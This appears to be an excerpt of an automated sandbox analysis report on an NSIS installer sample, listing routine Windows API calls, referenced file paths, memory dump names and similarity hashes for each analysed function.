                                                  APIs
                                                  • GetDlgItem.USER32(?), ref: 00401D45
                                                  • GetClientRect.USER32(00000000,?), ref: 00401D52
                                                  • LoadImageA.USER32(?,00000000,?,?,?,?), ref: 00401D73
                                                  • SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D81
                                                  • DeleteObject.GDI32(00000000), ref: 00401D90
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2238312050.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2238290730.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238332537.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238515254.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_3lH2EWD4wU.jbxd
                                                  Similarity
                                                  • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                  • String ID:
                                                  • API String ID: 1849352358-0
                                                  • Opcode ID: eb7aa93c274721a82f813915abcb93972a2dce3b863b89ff8b0ac985c59b3657
                                                  • Instruction ID: 19d294cafef6034250738095af8a4c7efea52b5f5fc7e0a3d6f731340b14d26e
                                                  • Opcode Fuzzy Hash: eb7aa93c274721a82f813915abcb93972a2dce3b863b89ff8b0ac985c59b3657
                                                  • Instruction Fuzzy Hash: EAF0ECB2600515AFDB00ABA4DE89DAFB7BCEB44305B04447AF641F2191CA748D018B38
                                                  APIs
                                                  • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C7A
                                                  • SendMessageA.USER32(00000000,00000000,?,?), ref: 00401C92
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2238312050.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2238290730.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238332537.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238515254.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_3lH2EWD4wU.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Timeout
                                                  • String ID: !
                                                  • API String ID: 1777923405-2657877971
                                                  • Opcode ID: 2275f1e70b71c4697b0e54cdc90b5e9c4bcde2e16bf34abc03187d516991a544
                                                  • Instruction ID: 6061c88af419790da573c0436b06ac7d5ed1a9fd9516c3c4f7c631bff8e6d743
                                                  • Opcode Fuzzy Hash: 2275f1e70b71c4697b0e54cdc90b5e9c4bcde2e16bf34abc03187d516991a544
                                                  • Instruction Fuzzy Hash: 2621A271E44209BEEF15DFA5D986AAE7BB4EF84304F24843EF501B61D0CB7885418F28
                                                  APIs
                                                  • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004031F9,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040341E,?,00000006,00000008,0000000A), ref: 0040593E
                                                  • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,004031F9,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040341E,?,00000006,00000008,0000000A), ref: 00405947
                                                  • lstrcatA.KERNEL32(?,0040A014,?,00000006,00000008,0000000A), ref: 00405958
                                                  Strings
                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00405938
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2238312050.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2238290730.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238332537.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238515254.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_3lH2EWD4wU.jbxd
                                                  Similarity
                                                  • API ID: CharPrevlstrcatlstrlen
                                                  • String ID: C:\Users\user\AppData\Local\Temp\
                                                  • API String ID: 2659869361-3936084776
                                                  • Opcode ID: 00f54151576635bf1518ba316310c1363eddf8ffcac7d82473bc198909657139
                                                  • Instruction ID: 7219f54bd6567b4b537029212711971aeb7da606d1672e2911cb7cc87ef8a5af
                                                  • Opcode Fuzzy Hash: 00f54151576635bf1518ba316310c1363eddf8ffcac7d82473bc198909657139
                                                  • Instruction Fuzzy Hash: 90D0A7A2102A31AAE10127154C05DCF6A08CF023507040036F200B2191C73C0D418BFE
                                                  APIs
                                                  • DestroyWindow.USER32(00000000,00000000,00402EDF,00000001), ref: 00402D12
                                                  • GetTickCount.KERNEL32 ref: 00402D30
                                                  • CreateDialogParamA.USER32(0000006F,00000000,00402C7C,00000000), ref: 00402D4D
                                                  • ShowWindow.USER32(00000000,00000005), ref: 00402D5B
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2238312050.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2238290730.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238332537.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238515254.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_3lH2EWD4wU.jbxd
                                                  Similarity
                                                  • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                  • String ID:
                                                  • API String ID: 2102729457-0
                                                  • Opcode ID: 2b46cb1ea70d3002ff1e12295b5763c1d55ea381a2360d12b4260fd16352c354
                                                  • Instruction ID: beb49624fd26f69101be82d244f2f6f966a121381cf6cbe5bc22d12f3c535a1a
                                                  • Opcode Fuzzy Hash: 2b46cb1ea70d3002ff1e12295b5763c1d55ea381a2360d12b4260fd16352c354
                                                  • Instruction Fuzzy Hash: A0F05E30601621ABC7317B64FE4CA8F7AA4AB18B12751047AF148B21F4CB7848C28BAC
                                                  APIs
                                                    • Part of subcall function 00405FA0: lstrcpynA.KERNEL32(?,?,00000400,004032DE,Agitationers Setup,NSIS Error,?,00000006,00000008,0000000A), ref: 00405FAD
                                                    • Part of subcall function 004059D1: CharNextA.USER32(?,?,0042BC78,?,00405A3D,0042BC78,0042BC78,76233410,?,C:\Users\user\AppData\Local\Temp\,00405788,?,76233410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004059DF
                                                    • Part of subcall function 004059D1: CharNextA.USER32(00000000), ref: 004059E4
                                                    • Part of subcall function 004059D1: CharNextA.USER32(00000000), ref: 004059F8
                                                  • lstrlenA.KERNEL32(0042BC78,00000000,0042BC78,0042BC78,76233410,?,C:\Users\user\AppData\Local\Temp\,00405788,?,76233410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405A79
                                                  • GetFileAttributesA.KERNEL32(0042BC78,0042BC78,0042BC78,0042BC78,0042BC78,0042BC78,00000000,0042BC78,0042BC78,76233410,?,C:\Users\user\AppData\Local\Temp\,00405788,?,76233410,C:\Users\user\AppData\Local\Temp\), ref: 00405A89
                                                  Strings
                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00405A26
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2238312050.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2238290730.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238332537.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238515254.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_3lH2EWD4wU.jbxd
                                                  Similarity
                                                  • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                  • String ID: C:\Users\user\AppData\Local\Temp\
                                                  • API String ID: 3248276644-3936084776
                                                  • Opcode ID: fd356b8919337fe01a24efca68e850dbe45d0084ba8af47b2787d0181ceea021
                                                  • Instruction ID: ffa0610acded3722bed2d7d96fb1c232a132fb9d66bc0fefd21ab2e8d06464ef
                                                  • Opcode Fuzzy Hash: fd356b8919337fe01a24efca68e850dbe45d0084ba8af47b2787d0181ceea021
                                                  • Instruction Fuzzy Hash: 4EF04C25305D6556C622723A1C89AAF1A04CED3324759073FF891F12D2DB3C8A439DBE
                                                  APIs
                                                  • IsWindowVisible.USER32(?), ref: 0040506A
                                                  • CallWindowProcA.USER32(?,?,?,?), ref: 004050BB
                                                    • Part of subcall function 0040408B: SendMessageA.USER32(000103E0,00000000,00000000,00000000), ref: 0040409D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2238312050.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2238290730.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238332537.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238515254.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_3lH2EWD4wU.jbxd
                                                  Similarity
                                                  • API ID: Window$CallMessageProcSendVisible
                                                  • String ID:
                                                  • API String ID: 3748168415-3916222277
                                                  • Opcode ID: 2142c290a1f943eea3cbcd359024918697fc3eca74c4b32021e9b526f4e7b2b2
                                                  • Instruction ID: 78b8b48c00cf9c642473ee3ff4bb8652c0e006dd03d895f02bd3b5106f733cf3
                                                  • Opcode Fuzzy Hash: 2142c290a1f943eea3cbcd359024918697fc3eca74c4b32021e9b526f4e7b2b2
                                                  • Instruction Fuzzy Hash: AA015E71200608AFDF205F11DD80A6F37A5EB84750F14443AFA41B51D1D73A8C929EAA
                                                  APIs
                                                  • RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,00000400,: Completed,?,?,?,?,00000002,: Completed,?,004060CB,80000002), ref: 00405ECD
                                                  • RegCloseKey.ADVAPI32(?,?,004060CB,80000002,Software\Microsoft\Windows\CurrentVersion,: Completed,: Completed,: Completed,?,Completed), ref: 00405ED8
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2238312050.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2238290730.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238332537.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238515254.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_3lH2EWD4wU.jbxd
                                                  Similarity
                                                  • API ID: CloseQueryValue
                                                  • String ID: : Completed
                                                  • API String ID: 3356406503-2954849223
                                                  • Opcode ID: 81da800dade96896110552a5810a24f143c54bb094b4f61591ae75c107ad8ff5
                                                  • Instruction ID: 161d8fcf8587aa93f0d987360409ed3ef12a8a36c24b5ed9f98f318b00ae4845
                                                  • Opcode Fuzzy Hash: 81da800dade96896110552a5810a24f143c54bb094b4f61591ae75c107ad8ff5
                                                  • Instruction Fuzzy Hash: E0015A72500609EBDF228F61CD09FDB3BA8EF55364F00402AFA95A2191D778DA54DBA4
                                                  APIs
                                                  • FreeLibrary.KERNEL32(?,76233410,00000000,C:\Users\user\AppData\Local\Temp\,00403711,0040352B,?,?,00000006,00000008,0000000A), ref: 00403753
                                                  • GlobalFree.KERNEL32(00000000), ref: 0040375A
                                                  Strings
                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00403739
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2238312050.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2238290730.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238332537.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238515254.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_3lH2EWD4wU.jbxd
                                                  Similarity
                                                  • API ID: Free$GlobalLibrary
                                                  • String ID: C:\Users\user\AppData\Local\Temp\
                                                  • API String ID: 1100898210-3936084776
                                                  • Opcode ID: 6450b972aff65fe59d26657d82cdbaa5e3cda0ee416f3077b3e42c8154ca0fa8
                                                  • Instruction ID: b24f28e728a59e08de23ecbb17507a5b71a11735b8e3b636be16efbcbefcbfb5
                                                  • Opcode Fuzzy Hash: 6450b972aff65fe59d26657d82cdbaa5e3cda0ee416f3077b3e42c8154ca0fa8
                                                  • Instruction Fuzzy Hash: F7E0127351212097C7217F69EE4875AB7A86F46F22F09507AE8447B26487745C428BDC
                                                  APIs
                                                  • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402DCF,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\3lH2EWD4wU.exe,C:\Users\user\Desktop\3lH2EWD4wU.exe,80000000,00000003), ref: 00405985
                                                  • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402DCF,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\3lH2EWD4wU.exe,C:\Users\user\Desktop\3lH2EWD4wU.exe,80000000,00000003), ref: 00405993
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2238312050.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2238290730.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238332537.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238515254.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_3lH2EWD4wU.jbxd
                                                  Similarity
                                                  • API ID: CharPrevlstrlen
                                                  • String ID: C:\Users\user\Desktop
                                                  • API String ID: 2709904686-3125694417
                                                  • Opcode ID: a2cb5c10c54eab45be364f275a3e0fd7f40b7dc80b72c69925d8ec85e0f8a492
                                                  • Instruction ID: ff79c929155de07913877b57a895d1bbe205444e8a13cf8e1c8c73a821d1827b
                                                  • Opcode Fuzzy Hash: a2cb5c10c54eab45be364f275a3e0fd7f40b7dc80b72c69925d8ec85e0f8a492
                                                  • Instruction Fuzzy Hash: CDD0C7B3409E70AEF30353149D04B9FAA58DF16710F090466F580E6191C67C4D428BFD
                                                  APIs
                                                  • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405CF9,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405AAE
                                                  • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405AC6
                                                  • CharNextA.USER32(00000000,?,00000000,00405CF9,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405AD7
                                                  • lstrlenA.KERNEL32(00000000,?,00000000,00405CF9,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405AE0
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2238312050.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2238290730.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238332537.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238515254.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_3lH2EWD4wU.jbxd
                                                  Similarity
                                                  • API ID: lstrlen$CharNextlstrcmpi
                                                  • String ID:
                                                  • API String ID: 190613189-0
                                                  • Opcode ID: 63752835767028d7570d3bd2c367202728d3e51619cdcd0ff30af86384407b43
                                                  • Instruction ID: 2b94cf21fc0d9439dbab8b822db930a3447ea2d2cb1db815078a5a090280caf9
                                                  • Opcode Fuzzy Hash: 63752835767028d7570d3bd2c367202728d3e51619cdcd0ff30af86384407b43
                                                  • Instruction Fuzzy Hash: 6DF0C231201918AFCB02DBA8CD4099FBBA8EF06350B2540B9E841F7211D674EE01AFA9